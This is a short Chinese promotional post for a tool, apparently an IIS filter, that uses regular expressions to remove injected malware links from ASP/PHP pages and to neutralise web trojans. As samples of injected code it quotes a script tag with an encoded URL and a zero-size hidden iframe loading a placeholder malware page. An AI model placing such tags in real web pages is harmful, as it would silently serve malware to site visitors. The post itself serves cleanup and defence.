刚刚帮客户清除服务器硬盘 ASP / PHP 文件中的“挂马”代码连接,过一会又被“入侵者”加上,怎么办?
使用“
正则表达式”模式匹配“挂马”代码,
从 IIS 里清除“挂马”代码连接。不用修改硬盘 ASP / PHP 文件,不在担心错误修改客户ASP/PHP文件。
对于 <script src=http://%AA%BB%CC%DD%EE%FF%GG></script> 这样的加密URL连接,只需要使用一个“正则表达式”,即可从IIS中过滤整个服务器中类似的“挂马”代码连接。
对于 <iframe src=http://www.xxxx.com/muma.htm width=0 height=0></iframe> 这样的,width=0 height=0 设置为 0 的,也只需要通过“正则表达式”,即可轻松清除。
清除"挂马"代码连接目前有三个方式
1、智能识别标准HTML网页代码,对HTML/ASP/PHP/ASP.NET等网页的顶部和底部的“挂马特征”代码进行自动清除操作
2、使用"原样"模式清除,将需要清除的代码加入到 RepHtmlText.txt 文件中
3、使用"正则表达式"模式进行清除,可以自己定义“正则表达式”进行清除操作,使用范围更广
其他用途一,清除指定“关键字”功能
从HTML/ASP/PHP/ASP.NET网页清除任意内容,如实现关键字“清除”功能,将指定的关键字从 HTML/ASP/PHP/ASP.NET 网页里清除掉。
其他用途二,清除ASP/PHP木马HTML特征,使木马无法正常运行
从ASP/PHP文件里,找出一些常见的木马HTML特征,将指定的特征进行清除,使木马成为废品,从而无法正常运行。
软件介绍和下载地和
http://www.zcnt.com/guama.asp